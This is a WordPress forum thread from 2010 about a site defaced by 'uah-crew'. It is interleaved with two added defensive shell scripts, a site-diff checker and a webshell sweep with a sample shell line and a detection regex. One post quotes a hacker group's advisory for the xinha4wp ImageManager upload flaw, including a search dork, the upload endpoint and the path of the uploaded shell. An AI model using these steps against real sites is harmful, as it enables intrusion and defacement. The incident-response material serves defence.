Wordpress Themes - WP Forum at BFA

Wordpress Themes - WP Forum at BFA (http://forum.bytesforall.com/index.php)
-   New Versions, & Updating (http://forum.bytesforall.com/forumdisplay.php?f=12)
-   -   My site has been hacked - atahualpa 3.4.6 (http://forum.bytesforall.com/showthread.php?t=7593)

Mikii Jun 15, 2010 07:38 AM

My site has been hacked - atahualpa 3.4.6
 
hi.

My wordpress' website was just hacked. I strongly suspect Atahualpa, because re-downloading and re-installing it (version 3.4.6) solved the problem.

Any page of the website showed this crew signature: "uah-crew".

The "hacked" 3.4.6 version is available for reviewing. Just PM or email me and I'll send it to you.

Thanks for the attention.

Michele

juggledad Jun 15, 2010 08:16 AM

I would suspect it is your wordpress and/or server that was hacked.
Who is your host?
contact them and tell them you have been hacked.

What version of WordPress are you running?
use FTP and go look at the dates on all your other themes and all other wordpress files and see if there are any with a date that doesn't match the others.
Change your wordpress admin password
check all users in wordpress
change your ftp password
look to see if there are any other FTP users you don't know
change your cpanel/host password, check to see if there are any others you don't recognize
scan your wordpress database for any potential sql injections

do a google search on 'wordpress hacked' and follow the directions

This is not a fun thing to have happen or easy thing to have fixed. Hundreds of wordpress sites were hacked into a couple months ago at bluehost and it was a server security issue.

good luck recovering
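
A concrete way to do the "look at the dates" and "find files that don't match" steps above is to pull the whole site down over FTP/SFTP, download a fresh copy of the same WordPress, theme and plugin versions, and diff the two trees byte for byte; an attacker-written index.php then shows up as MODIFIED regardless of whether they also faked its timestamp. The script below is an added illustration, not part of juggledad's reply or of any WordPress or Atahualpa tooling; the directory layout, file contents and the "uah-crew" defacement string in the demo are constructed for the example.

```shell
#!/bin/sh
# Added example, not code from the thread. Compares the WordPress tree pulled
# down from the server (LIVE) against a freshly downloaded copy of the same
# WordPress/theme/plugin versions (CLEAN) and reports files that were added,
# modified or deleted, then offers an mtime-based check for recently touched
# files. Paths and contents in demo_diff are constructed, not the poster's site.

# changed_files LIVE CLEAN
#   "ADDED path"    file exists only in LIVE (something was dropped)
#   "MODIFIED path" bytes differ from CLEAN (something was rewritten)
#   "MISSING path"  file exists only in CLEAN (something was deleted)
changed_files() {
  live=$1; clean=$2
  ( cd "$live" && find . -type f | sort ) | while IFS= read -r f; do
    if [ ! -f "$clean/$f" ]; then
      printf 'ADDED    %s\n' "$f"
    elif ! cmp -s "$live/$f" "$clean/$f"; then
      printf 'MODIFIED %s\n' "$f"
    fi
  done
  ( cd "$clean" && find . -type f | sort ) | while IFS= read -r f; do
    [ -f "$live/$f" ] || printf 'MISSING  %s\n' "$f"
  done
}

# recent_files DIR DAYS
#   Files under DIR modified within the last DAYS days. This is the FTP
#   "look at the dates" check in one command; it is only a hint, because an
#   attacker can reset mtimes, which is why changed_files is the real test.
recent_files() {
  find "$1" -type f -mtime "-$2"
}

# demo_diff: build a tiny CLEAN tree and a LIVE tree with a defaced theme
# index, a dropped PHP file and a deleted stylesheet, then report.
demo_diff() {
  tmp=$(mktemp -d)
  theme=wp-content/themes/atahualpa
  mkdir -p "$tmp/clean/$theme" "$tmp/clean/wp-content/uploads"
  printf '<?php get_header(); ?>\n' > "$tmp/clean/$theme/index.php"
  printf '/* theme css */\n' > "$tmp/clean/$theme/style.css"
  printf '<?php // root loader\n' > "$tmp/clean/index.php"
  cp -R "$tmp/clean" "$tmp/live"
  # Simulated compromise (constructed): rewritten theme index, dropped file,
  # deleted stylesheet. The root index.php is left untouched.
  printf '<html>hacked by uah-crew</html>\n' > "$tmp/live/$theme/index.php"
  printf '<?php // dropped\n' > "$tmp/live/wp-content/uploads/x.php"
  rm "$tmp/live/$theme/style.css"
  out=$(changed_files "$tmp/live" "$tmp/clean")
  rm -rf "$tmp"
  printf '%s\n' "$out"
}

demo_diff
```

Run it against real directories with `changed_files /path/to/live /path/to/clean`; anything reported under wp-content/uploads or as MODIFIED in core or theme files is where to start reading, and `recent_files /path/to/live 7` narrows the search when the defacement date is known.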

Mikii Jun 15, 2010 08:49 AM

Dear juggledad,

All I can say is that public_html/wp-content/themes/atahualpa/index.php had been re-written. I am still investigating how. WP is 2.9.2.

The original directory has already been replaced on server, and re-installing Atahualpa solved the problem.

Thanks for your suggestions, please feel free to change the subject of this post if you feel it's not an atahualpa "hole".

Will keep you posted.

juggledad Jun 15, 2010 09:38 AM

You have wordpress installed in 'public_html'???? how secure is it?
who is the host?
what is the url?

Mikii Jun 15, 2010 09:50 AM

url is www.tendertonaveitalia.net

host is hostingplan.net / Cpanel / linux

pardon my ignorance, what is wrong with putting wordpress on your root home directory?

Tnx.

juggledad Jun 15, 2010 09:51 AM

when I see 'public' in a folder name, alarms go off. Now it might be quite secure, but I'd check it out. It's just me being nervous.

Have you contacted the host to see if anyone else was hacked?

Mikii Jun 15, 2010 10:16 AM

Quote:

Originally Posted by juggledad (Post 34447)
when I see 'public' in a folder name, alarms go off. Now it might be quite secure, but I'd check it out. It's just me being nervous.

Have you contacted the host to see if anyone else was hacked?

I see. "public html" is just an alias to "www". It's the place where all the "web" stuff go.

Yes I did contact my host. hopefully They'll find out how the hacker got his hands on the index.php.

Thank you for your feedback. Cheers!

DannyLife Jun 15, 2010 11:09 AM

I had a site get hacked not too long ago with exactly the same method. It wasn't anything to do with the theme, apparently they got in through a plug-in that I hadn't updated. So check and make sure they're all up to the current version.

Mikii Jun 15, 2010 11:32 AM

Quote:

Originally Posted by DannyLife (Post 34457)
I had a site get hacked not too long ago with exactly the same method. It wasn't anything to do with the theme, apparently they got in through a plug-in that I hadn't updated. So check and make sure they're all up to the current version.

yes, I found this via google. Only: I do not have ImageManager installed. Was this your plugin?

------
===============================================================
Wordpress xinha4wp xinha_core plugins File Upload Vulnerability
===============================================================

####################################################################

Author : Hackeri-AL
Contact : hackeri-al[at]live[dot]com
Greetz : LoocK3D & all Albania and Kosova Hackers
My Group : UAH-Crew = United Albania Hackers

####################################################################

[~] DORK: /imagemanager/demo_images/wp/ site: com ,de , org / etc...

--------------------------------------------------------------------

[~] You go to: htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/
[~] Then we : htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/manager.php <[ upload here shell ]
[~] Shell : htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/demo_images/yourShell.php

####################################################################

[~] Video: http://www.youtube.com/watch?v=BG-OVjG8dcs

####################################################################

[~] Proud 2 be Albania
[~] Proud 2 be Muslim
[~] United States of Albania

####################################################################


# Inj3ct0r.com [2010-04-16]

------
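
The advisory above describes an unauthenticated upload that drops a PHP shell into the plugin's demo_images directory. The matching check on a site that is already running is to look for PHP files in directories that should only ever hold images and triage their contents for webshell constructs. The sweep below is an added example, not part of the thread, the advisory, or the plugin; the directory names, the indicator regex and the files built by demo_sweep are assumptions to tune for your own site.

```shell
#!/bin/sh
# Added example, not code from the thread or from the advisory. Sweeps a
# WordPress webroot for PHP files sitting in directories that should only
# ever hold images (uploads, demo_images, cache) and triages each one for
# common webshell indicators. Directory names and indicator patterns are
# assumptions, not facts from the page.

# Extended regex of constructs that almost never belong in a file dropped
# into an image directory (assumed indicator list; extend as needed).
SHELL_PATTERNS='(eval|assert|base64_decode|gzinflate|str_rot13|shell_exec|passthru|system|exec)\(|\$_(REQUEST|GET|POST)\['

# php_in_image_dirs WEBROOT
#   Lists files with a PHP-executable extension under any uploads/,
#   demo_images/ or cache/ directory below WEBROOT. Exit 0 even when empty.
php_in_image_dirs() {
  find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php5' \) \
    | grep -E '/(uploads|demo_images|cache)/' || true
}

# suspicious_php FILE
#   Exit 0 and print the matching lines when FILE contains an indicator.
suspicious_php() {
  grep -nE "$SHELL_PATTERNS" "$1"
}

# sweep WEBROOT
#   "SHELL?" for PHP in an image directory that also matches an indicator,
#   "PHP-IN-IMAGEDIR" for PHP that is merely in the wrong place. Both
#   deserve a look; the first deserves it now.
sweep() {
  php_in_image_dirs "$1" | while IFS= read -r f; do
    if suspicious_php "$f" >/dev/null; then
      printf 'SHELL?          %s\n' "$f"
    else
      printf 'PHP-IN-IMAGEDIR %s\n' "$f"
    fi
  done
}

# demo_sweep: constructed webroot with a dropped shell at the ImageManager
# demo_images path named in the advisory, a harmless PHP file in uploads/,
# a normal theme file and an image. All contents are made up for the demo.
demo_sweep() {
  tmp=$(mktemp -d)
  im=$tmp/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/demo_images
  mkdir -p "$im" "$tmp/wp-content/uploads/2010/06" "$tmp/wp-content/themes/atahualpa"
  cat > "$im/yourShell.php" <<'EOF'
<?php /* constructed sample; matches the indicator regex */
eval(base64_decode($_POST['p']));
EOF
  cat > "$tmp/wp-content/uploads/legit.php" <<'EOF'
<?php /* constructed helper: serves a cached thumbnail, no indicators */
header('Content-Type: image/png');
EOF
  printf '<?php get_header(); ?>\n' > "$tmp/wp-content/themes/atahualpa/index.php"
  printf 'not really a jpeg\n' > "$tmp/wp-content/uploads/2010/06/photo.jpg"
  out=$(sweep "$tmp")
  rm -rf "$tmp"
  printf '%s\n' "$out"
}

demo_sweep
```

Run `sweep /path/to/public_html` on the downloaded copy of the site. A file flagged SHELL? is evidence, not proof, so keep it for the host and your own timeline work rather than deleting it on the spot; and note that the sweep only finds files, not the upload endpoint that put them there, so updating or removing the vulnerable plugin is still required.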

DannyLife Jun 15, 2010 11:58 AM

Sorry, I never got to see the details. My host dealt with it and informed me that I needed to update the plug-ins. I wasn't using ImageManager either though.

Mikii Jun 15, 2010 12:15 PM

I see. Thanks. All my plugins are updated now. Hope my host will be able to tell me what the problem was.

Knut Sparhell Jun 17, 2010 09:09 PM

Quote:

Originally Posted by juggledad (Post 34447)
when I see 'public' in a folder name, alarms go off. Now it might be quite secure, but I'd check it out. It's just me being nervous.

The public_html alias www is the standard (by Linux based Web Hosts) naming of the user folder that will serve as the root folder for the web site. Similar to public_ftp for your ftp site. It's just a name. It doesn't imply it initially has write access for everyone.
